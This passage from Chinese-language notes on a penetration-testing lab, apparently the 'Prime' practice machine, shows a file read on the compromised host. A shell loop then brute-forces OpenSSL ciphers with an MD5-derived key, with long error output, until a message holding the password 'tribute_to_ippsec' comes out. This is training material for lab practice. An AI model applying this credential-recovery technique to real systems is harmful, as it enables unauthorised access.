-provider val Provider to load (can be specified multiple times)
-propquery val Property query used when fetching algorithms
-K val Raw key, in hex
原始的Raw格式的key
linux od命令
NAME
od - dump files in octal and other formats
主要是用于转换8进制的
octal 就是八进制
└─# od --help
用法:od [选项]... [文件]...
或:od [-abcdfilosx]... [文件] [[+]偏移量[.][b]]
或:od --traditional [选项]... [文件] [[+]偏移量[.][b] [+][标签][.][b]]
以无歧义的表示方式将 <文件> 输出至标准输出,默认为八进制字节形式。
如果指定了多于一个 <文件>,则将它们按照列出的顺序连接起来作为输入。
如果没有指定 <文件>,或者 <文件> 为 "-",则从标准输入读取。
如果第一个和第二个调用格式都符合,则在最后一个操作对象以 "+" 或者数字
(当有两个操作对象时)开头的情况下,使用第二种格式。<偏移量> 作为操作
对象时,等价于 "-j 偏移量"。<标签> 是所打印的第一个字节的伪地址,随着
转储过程的进行而递增。<偏移量> 和 <标签> 如果冠以 "0x" 或 "0X" 前缀则
表示十六进制数;后缀 "." 代表八进制数,后缀 "b" 表示乘以 512。
长选项的必选参数对于短选项也是必选的。
-A, --address-radix=基数 指定文件偏移量的输出格式;这里给出的 <基数>
是 [doxn] 其中之一,分别代表十进制、八进制、
十六进制和无基数
--endian={big|little} 按照指定的字节序交换输入字节
-j, --skip-bytes=字节数 处理前先跳过 <字节数> 个输入字节
-N, --read-bytes=字节数 最多读取 <字节数> 个输入的字节
-S 字节数, --strings[=字节数] 仅显示至少包含 <字节数>(默认为 3)个
可打印字符的、以 NUL 结尾的字符串
-t, --format=类型 选择一个或多个输出格式
-v, --output-duplicates 不使用 "*" 字符代替被省略的行
-w[字节数], --width[=字节数] 每一行输出 <字节数> 个字节;
如未指定 <字节数>,则默认为 32
--traditional 接受以上述第三种格式提供的参数
--help 显示此帮助信息并退出
--version 显示版本信息并退出
传统的格式说明符可以混合使用,不同的格式可以累加:
-a 即 -t a, 输出字符的名称,忽略最高位
-b 即 -t o1,输出八进制字节
-c 即 -t c, 输出可打印字符或者使用反斜杠转义
-d 即 -t u2,输出无符号十进制数,两个字节为一个输出单位
-f 即 -t fF,输出浮点数
-i 即 -t dl,输出十进制整型 (int)
-l 即 -t dL,输出十进制长整型 (long)
-o 即 -t o2,输出八进制数,两个字节为一个输出单位
-s 即 -t d2,输出十进制数,两个字节为一个输出单位
-x 即 -t x2,输出十六进制数,两个字节为一个输出单位
<类型> 是由下面一种或多种说明符组成的:
a 字符名称,忽略最高位
c 可打印字符或者使用反斜杠转义
d[大小] 有符号十进制数,每个整数占 <大小> 个字节
f[大小] 浮点数,每个浮点数占 <大小> 个字节
o[大小] 八进制数,每个整数占 <大小> 个字节
u[大小] 无符号十进制数,每个整数占 <大小> 个字节
x[大小] 十六进制数,每个整数占 <大小> 个字节
<大小> 是一个数字。如果 <类型> 是 [doux] 之一,<大小> 也可以是:
C 代表 sizeof(char)、S 代表 sizeof(short)、I 代表 sizeof(int),
或 L 代表 sizeof(long)。如果 <类型> 是 f,<大小> 也可以是:
F 代表 sizeof(float)、D 代表 sizeof(double),或 L 代表 sizeof(long double)。
在任何类型后面加上 "z" 后缀,将会在每个输出行的末尾显示可打印字符。
如果 <字节数> 有 "0x" 或 "0X" 前缀,则将其视为十六进制数。
<字节数> 可以有乘数后缀:
b 512
KB 1000
K 1024
MB 1000*1000
M 1024*1024
G、T、P、E、Z、Y、R、Q 以此类推。
也可以使用二进制前缀:KiB=K、MiB=M,以此类推。
GNU coreutils 在线帮助:<https://www.gnu.org/software/coreutils/>
请向 <http://translationproject.org/team/zh_CN.html> 报告任何翻译错误
完整文档 <https://www.gnu.org/software/coreutils/od>
或者在本地使用:info '(coreutils) od invocation'
┌──(root㉿kali)-[~/Desktop/Prime]
└─# echo -n 'ippsec' | md5sum | awk -F ' ' '{print $1}' | od -A n -t x1
33 36 36 61 37 34 63 62 33 63 39 35 39 64 65 31
37 64 36 31 64 62 33 30 35 39 31 63 33 39 64 31
0a
┌──(root㉿kali)-[~/Desktop/Prime]
└─# echo -n 'ippsec' | md5sum | awk -F ' ' '{print $1}' | tr -d '\n' | od -A n -t x1
33 36 36 61 37 34 63 62 33 63 39 35 39 64 65 31
37 64 36 31 64 62 33 30 35 39 31 63 33 39 64 31
┌──(root㉿kali)-[~/Desktop/Prime]
└─# echo -n 'ippsec' | md5sum | awk -F ' ' '{print $1}' | tr -d '\n' | od -A n -t x1 | tr -d '\n'
33 36 36 61 37 34 63 62 33 63 39 35 39 64 65 31 37 64 36 31 64 62 33 30 35 39 31 63 33 39 64 31
┌──(root㉿kali)-[~/Desktop/Prime]
└─# echo -n 'ippsec' | md5sum | awk -F ' ' '{print $1}' | tr -d '\n' | od -A n -t x1 | tr -d '\n' | tr -d ' '
3336366137346362336339353964653137643631646233303539316333396431
这里为什么要去找openssl的enc呢,因为我们在/home目录下看到的存在
在enc.txt里面拿到的这个enc.txt拿到的这个字符串,他是base64编码的,然后要对这个字符串进行解码,再进行解密。
www-data@ubuntu:/home/saket$ cat enc.txt
cat enc.txt
nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=
www-data@ubuntu:/home/saket$
-d Decrypt
-a Base64 encode/decode, depending on encryption flag
-A Used with -[base64|a] to specify base64 buffer as a single line
┌──(root㉿kali)-[~/Desktop/Prime]
└─# for Cipher in $(cat CipherTypeRaws);do echo -n 'nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=' | openssl enc -d -a -$Cipher -K 3336366137346362336339353964653137643631646233303539316333396431;done
iv undefined
hex string is too long, ignoring excess
bad decrypt
80E617BB6C7F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
hex string is too long, ignoring excess
bad decrypt
802683E0667F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
bad decrypt
800666C5AD7F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
hex string is too long, ignoring excess
bad decrypt
80C69DCE5C7F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
hex string is too long, ignoring excess
bad decrypt
80765A1DF97F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
bad decrypt
80C6A5831E7F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
iv undefined
iv undefined
iv undefined
hex string is too long, ignoring excess
bad decrypt
80A618B2777F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
enc: Unknown option or cipher: blake2b512
enc: Use -help for summary.
80B6C13A8E7F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (blake2b512 : 101), Properties (<null>)
enc: Unknown option or cipher: blake2s256
enc: Use -help for summary.
80862598BD7F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (blake2s256 : 99), Properties (<null>)
iv undefined
hex string is too long, ignoring excess
bad decrypt
80E624AB2B7F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
hex string is too long, ignoring excess
bad decrypt
800638B35C7F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
bad decrypt
80B6FEC81D7F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
iv undefined
iv undefined
hex string is too long, ignoring excess
bad decrypt
8096F8558D7F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
hex string is too long, ignoring excess
bad decrypt
80065927AC7F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
hex string is too long, ignoring excess
bad decrypt
80764275907F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
hex string is too long, ignoring excess
bad decrypt
8076F7C62E7F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
enc: Unknown option or cipher: md4
enc: Use -help for summary.
80E640F7987F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (md4 : 97), Properties (<null>)
enc: Unknown option or cipher: md5
enc: Use -help for summary.
8026E6D1B47F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (md5 : 98), Properties (<null>)
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
hex string is too long, ignoring excess
bad decrypt
8016788E007F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
hex string is too long, ignoring excess
hex string is too long, ignoring excess
enc: Unknown option or cipher: rmd160
enc: Use -help for summary.
8026E546657F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (rmd160 : 0), Properties (<null>)
iv undefined
iv undefined
iv undefined
hex string is too long, ignoring excess
bad decrypt
8016FA84C67F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
enc: Unknown option or cipher: sha1
enc: Use -help for summary.
809659148C7F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha1 : 87), Properties (<null>)
enc: Unknown option or cipher: sha224
enc: Use -help for summary.
80463B5F687F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha224 : 85), Properties (<null>)
enc: Unknown option or cipher: sha256
enc: Use -help for summary.
80968340C77F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha256 : 100), Properties (<null>)
enc: Unknown option or cipher: sha3-224
enc: Use -help for summary.
80761F73F47F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha3-224 : 86), Properties (<null>)
enc: Unknown option or cipher: sha3-256
enc: Use -help for summary.
80C69E17C57F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha3-256 : 95), Properties (<null>)
enc: Unknown option or cipher: sha3-384
enc: Use -help for summary.
80C661AF047F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha3-384 : 88), Properties (<null>)
enc: Unknown option or cipher: sha3-512
enc: Use -help for summary.
8056A70B197F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha3-512 : 83), Properties (<null>)
enc: Unknown option or cipher: sha384
enc: Use -help for summary.
80267A1E897F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha384 : 93), Properties (<null>)
enc: Unknown option or cipher: sha512
enc: Use -help for summary.
8046BD07937F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha512 : 90), Properties (<null>)
enc: Unknown option or cipher: sha512-224
enc: Use -help for summary.
80B6C126207F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha512-224 : 91), Properties (<null>)
enc: Unknown option or cipher: sha512-256
enc: Use -help for summary.
805679F1CE7F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha512-256 : 84), Properties (<null>)
enc: Unknown option or cipher: shake128
enc: Use -help for summary.
80A60163A97F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (shake128 : 103), Properties (<null>)
enc: Unknown option or cipher: shake256
enc: Use -help for summary.
8076F9804C7F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (shake256 : 92), Properties (<null>)
enc: Unknown option or cipher: sm3
enc: Use -help for summary.
8076FA26EB7F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sm3 : 94), Properties (<null>)
iv undefined
iv undefined
iv undefined
hex string is too long, ignoring excess
bad decrypt
80D6E1A7117F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
enc: Unknown option or cipher: zlib
enc: Use -help for summary.
80B6B7F5ED7F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (zlib : 0), Properties (<null>)
enc: Unknown option or cipher: zstd
enc: Use -help for summary.
80B698C8CE7F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (zstd : 0), Properties (<null>)
有很多报错结果,这是正常的,但是这里面还存在一个openssl的bug
这个这块有的时候他需要这个\n,就是去掉换行符,有的时候不需要
那什么时候不需要呢,就取决于这个里边有没有真正的换行符
在如果这里边有真正的换行符
它在转化之后,它在破解完之后
它就应该是回航的
那如果要有,那我又放了这个\n
那显然是解不开的
那这种情况呢也只能这么去试
这个一般认为这个是openssl的bug
┌──(root㉿kali)-[~/Desktop/Prime]
└─# for Cipher in $(cat CipherTypeRaws);do echo 'nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=' | openssl enc -d -a -$Cipher -K 3336366137346362336339353964653137643631646233303539316333396431;done
iv undefined
hex string is too long, ignoring excess
bad decrypt
80B6DCFD587F0000:error:1C800064:Provider routines:ossl_cipher_unpadblock:bad decrypt:../providers/implementations/ciphers/ciphercommon_block.c:107:
l{���[��7�ƏmfE��K����;0�`Z▒�� :�y��N�.�Fj�|z�x�G���rd��/��
�:�Z91�yMV���@��S▒u����_j,����^+�FAC��ﴌ6���-��~��I�_���%���C���Դ��:��}T�q�4�同��#��ʛiv undefined
hex string is too long, ignoring excess
bad decrypt
80F61910797F0000:error:1C800064:Provider routines:ossl_cipher_unpadblock:bad decrypt:../providers/implementations/ciphers/ciphercommon_block.c:107:
~I�l2UFײ:H3V�>Z����§��N[sgħ��:��-]�����v;ń#�M��|g��
�|&�As
�� �B0��mĖ�*�0r������{Hw� Ƕ�~�g�X�2▒�'+��+�����[D���5��d����!%o {iv undefined
!!!!
看这里
!!!!
Dont worry saket one day we will reach to
our destination very soon. And if you forget
your username then use your old password
==> "tribute_to_ippsec"
Victor,iv undefined
!!!!
看这里
!!!!
iv undefined
iv undefined
iv undefined
iv undefined
hex string is too long, ignoring excess
bad decrypt
8056B856477F0000:error:1C800064:Provider routines:ossl_cipher_unpadblock:bad decrypt:../providers/implementations/ciphers/ciphercommon_block.c:107:
t[�����/<T5u���L?c���4��G�▒�ki*�U�f��E0��o��qp���õ/▒���@�wh��G�
ec�r�������]1��9ґp�IDW�p�wj��%�f�~2�LD▒�iv undefined �?g�
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
hex string is too long, ignoring excess
<�▒�bØ�H�� TG
\�|��$�4���E����F���lS9��s��5��IV:W�[ijn1��E����=��YShL�����Tsq�"���{L�,"
�q�7w1|����s�;�d���/�S��▒7���%h��7�(
bad decrypt
805601DA5A7F0000:error:1C800064:Provider routines:ossl_cipher_unpadblock:bad decrypt:../providers/implementations/ciphers/ciphercommon_block.c:107:
"yR����v�2�iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
bad decrypt
8076DB188A7F0000:error:1C800064:Provider routines:ossl_cipher_unpadblock:bad decrypt:../providers/implementations/ciphers/ciphercommon_block.c:107:
,_���U(t��^>�3cm��=��~�V�ĩx&q�k����!�Z)�ͻ�x�I�䞝JW��▒���a�P����U����N5���Q�c�^Ƕ�> �W*��W����)~Rc#�c`ҋ���u�IPV����yX����]Oan�+�vJ▒1��iv undefined
?L.�ocX(���K��r�t�=���B�w�w����8*_���E#�������m8Bz\�7p��Jv��v�,6ב��;X�G'+��P���X�;j;f���YS1
�
��Ֆt7iv undefined
iv undefined
iv undefined
hex string is too long, ignoring excess
1�a��4�#�yQ.��H���
��8iN�HAn*�RXz{�GS��u�.��ߩ�Y���(�$Ҙ��z�gwF
1�EixN4��Rs�8�e�∌K �B�6M�ە�^vay��IQg
bad decrypt
80661AF0FD7E0000:error:1C800064:Provider routines:ossl_cipher_unpadblock:bad decrypt:../providers/implementations/ciphers/ciphercommon_block.c:107:
b����)-�wK8Qwx���ϥ��n�U"��1a|$t���HLF�σiv undefined
enc: Unknown option or cipher: blake2b512
enc: Use -help for summary.
80469CB9D57F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (blake2b512 : 101), Properties (<null>)
enc: Unknown option or cipher: blake2s256
enc: Use -help for summary.
8066C069117F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (blake2s256 : 99), Properties (<null>)
iv undefined
hex string is too long, ignoring excess
�!�#bW'ˀ�KE;!�"��{cyF
���7^��4�^�▒�9v��N�Ŧ+2f
���{��u\Z�|�2 �0�'Z�j�wUpRd��ew�:�˪\� �M�TkG%�Nƃ�g�S����Ր��O�{�osV�%�؆��c����0�a�YDD0d�Y�
bad decrypt
8036B8337F7F0000:error:1C800064:Provider routines:ossl_cipher_unpadblock:bad decrypt:../providers/implementations/ciphers/ciphercommon_block.c:107:
C&iv undefined
hex string is too long, ignoring excess
bad decrypt
80E6DAADD27F0000:error:1C800064:Provider routines:ossl_cipher_unpadblock:bad decrypt:../providers/implementations/ciphers/ciphercommon_block.c:107:
�����?�E��wUaf�,T�]6�o�*��h}������J���7c�ю��@�J7��
��L�������~�2C�L34�4ĺ�s��I�$>���7��f����O
�+�{liSLʉ���,��E�U WǜS`Gsj����6�/��t~iv undefined
ހ��Ӑ��<�%wLC�~u����pgu�F��:XM��Jc�|����Ř▒��6"�����]7����#����Oܛ�=�
���K��F$��L����IF��u4�fE+.�-W����2
bad decrypt
8046E1C24D7F0000:error:1C800064:Provider routines:ossl_cipher_unpadblock:bad decrypt:../providers/implementations/ciphers/ciphercommon_block.c:107:
%�(�xC�E����s:�j��7��d�ئ!jc���S��2ʤiv undefined
iv undefined
iv undefined
hex string is too long, ignoring excess
bad decrypt
80E6C27F7D7F0000:error:1C800064:Provider routines:ossl_cipher_unpadblock:bad decrypt:../providers/implementations/ciphers/ciphercommon_block.c:107:
F�?�<>�~�(�E}�5��\��▒S��4NZ硶Kt��A�fT���C�����R6�������7������-A|��5���Ƞ�`;R��c&m#m�T<x�cq=�oh�▒�0Wb�l��aB�aZ�z"��fTːq_ԙS���&Y�7�^;��]�9�t s�iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
hex string is too long, ignoring excess
bad decrypt
80165DD57F7F0000:error:1C800064:Provider routines:ossl_cipher_unpadblock:bad decrypt:../providers/implementations/ciphers/ciphercommon_block.c:107:
�Ղ�$�%�.�%��r�A�z��9�_�����;�E��f�|F:{��mfq2�j� >�<����0����Ӓ�������2�&?r�'��:k(#j�0N!���xU0��쯾6b�>���o)������hex string is too long, ignoring excess
+�D��L�Ҁ�7(��[x��%����E=�<>d&�N�\�D���
bad decrypt
80665F06AA7F0000:error:1C800064:Provider routines:ossl_cipher_unpadblock:bad decrypt:../providers/implementations/ciphers/ciphercommon_block.c:107:
��c�*� �`���OjJ-�X�{�'��V�X{g��C▒J,�E
�7�W3η���T��^T��DK=���w�j��&��J?����h(Վ�dId�
6�z��i���FYDN
Q��ghex string is too long, ignoring excess
bad decrypt
80967545767F0000:error:1C800064:Provider routines:ossl_cipher_unpadblock:bad decrypt:../providers/implementations/ciphers/ciphercommon_block.c:107:
6^{�h�R�J-'�yAv/>c�GHA�זϞ�V����$�㢡U�oX�+(���{X���)#KB��g,�5��▒�]��r恘`�����e�9���H▒�k��n�D�i|a��<�\��Kc▒&9S�O��τjg�)�V��-�[7�=��ݹgT��Thiv undefined
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
enc: Unknown option or cipher: md4
enc: Use -help for summary.
8086E19EBB7F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (md4 : 97), Properties (<null>)
enc: Unknown option or cipher: md5
enc: Use -help for summary.
8056D852157F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (md5 : 98), Properties (<null>)
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
hex string is too long, ignoring excess
�>�kO;}r�HLp
bad decrypt
80D697C6157F0000:error:1C800064:Provider routines:ossl_cipher_unpadblock:bad decrypt:../providers/implementations/ciphers/ciphercommon_block.c:107:
��0�+y@�m�^������'���L9*�X�A9{G�+��"��@w���8��wģ�"�TE�����uq(f�iv undefined
hex string is too long, ignoring excess
����3�'�/?�PR�| {���B�t�r_���?3�&
����I�9/`�v�����vz~z�(���5��k��iG�[�<gG�▒���j`*/�f�2�
�VX�I.p�Y2DY4��=C��*���Rl!F��▒�t�fyE�<i��y!��MK�N� =�<hex string is too long, ignoring excess
����NEI�g�▒�?�L��7�Aˍ�ZV.D*��d���Ʀ�2�J���fԦW �<���,3���W��rIJ�q"��n���#雥��q����'��N6�(
A5-j��y]G!a��O��� z�[,?�T�r;enc: Unknown option or cipher: rmd160
enc: Use -help for summary.
80861B00237F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (rmd160 : 0), Properties (<null>)
iv undefined
iv undefined
iv undefined
hex string is too long, ignoring excess
+�� ��A��!�]v6
bad decrypt
8056197AAF7F0000:error:1C800064:Provider routines:ossl_cipher_unpadblock:bad decrypt:../providers/implementations/ciphers/ciphercommon_block.c:107:
�q�▒{T�:�$���� �Qr������4Tԥ�OY�▒�MU�*��{H�$�%�6X��Vc�F�W,���&<�1�GE2��{����4��Q0�{^;!J*��טŮ��PdDXH��Ɍ �#�炅;�<DD��f�
tiv undefined
enc: Unknown option or cipher: sha1
enc: Use -help for summary.
808624580D7F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha1 : 87), Properties (<null>)
enc: Unknown option or cipher: sha224
enc: Use -help for summary.
80069C857D7F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha224 : 85), Properties (<null>)
enc: Unknown option or cipher: sha256
enc: Use -help for summary.
80763FBA477F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha256 : 100), Properties (<null>)
enc: Unknown option or cipher: sha3-224
enc: Use -help for summary.
80A60108E77F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha3-224 : 86), Properties (<null>)
enc: Unknown option or cipher: sha3-256
enc: Use -help for summary.
804662B98B7F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha3-256 : 95), Properties (<null>)
enc: Unknown option or cipher: sha3-384
enc: Use -help for summary.
80C601CC587F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha3-384 : 88), Properties (<null>)
enc: Unknown option or cipher: sha3-512
enc: Use -help for summary.
80A61C76AB7F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha3-512 : 83), Properties (<null>)
enc: Unknown option or cipher: sha384
enc: Use -help for summary.
8086BEE0157F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha384 : 93), Properties (<null>)
enc: Unknown option or cipher: sha512
enc: Use -help for summary.
80C68598357F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha512 : 90), Properties (<null>)
enc: Unknown option or cipher: sha512-224
enc: Use -help for summary.
80C6D8DC807F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha512-224 : 91), Properties (<null>)
enc: Unknown option or cipher: sha512-256
enc: Use -help for summary.
80669F5ED77F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha512-256 : 84), Properties (<null>)
enc: Unknown option or cipher: shake128
enc: Use -help for summary.
80F66417337F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (shake128 : 103), Properties (<null>)
enc: Unknown option or cipher: shake256
enc: Use -help for summary.
80A69F50727F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (shake256 : 92), Properties (<null>)
enc: Unknown option or cipher: sm3
enc: Use -help for summary.
802698AB137F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sm3 : 94), Properties (<null>)
iv undefined
iv undefined
iv undefined
hex string is too long, ignoring excess
bad decrypt
80067A41787F0000:error:1C800064:Provider routines:ossl_cipher_unpadblock:bad decrypt:../providers/implementations/ciphers/ciphercommon_block.c:107:
d��;�����c�?�>����=���)�,��Ǵx�]����+aT�Ja[�ˇ�����0�H����h�A��
pvyk���]!W�'�m�۽w�v^����n��᥊+���eB_ȓ��Jw�N���{7 ����d�B%A���e��/�7=��\iv undefined
enc: Unknown option or cipher: zlib
enc: Use -help for summary.
80E6F77ACE7F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (zlib : 0), Properties (<null>)
enc: Unknown option or cipher: zstd
enc: Use -help for summary.
80D67FCD197F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (zstd : 0), Properties (<null>)
Dont worry saket one day we will reach to
our destination very soon. And if you forget
your username then use your old password
==> "tribute_to_ippsec"
Victor,iv undefined
这里就是破解出来了
但是我们不知道是循环到那一次才破解出来的,所以还需要再改一下
2>/dev/null ;echo $Cipher;done
先将报错就输出到null,然后再把每次循环时输出一下是循环到那个变量了,echo出来。
┌──(root㉿kali)-[~/Desktop/Prime]
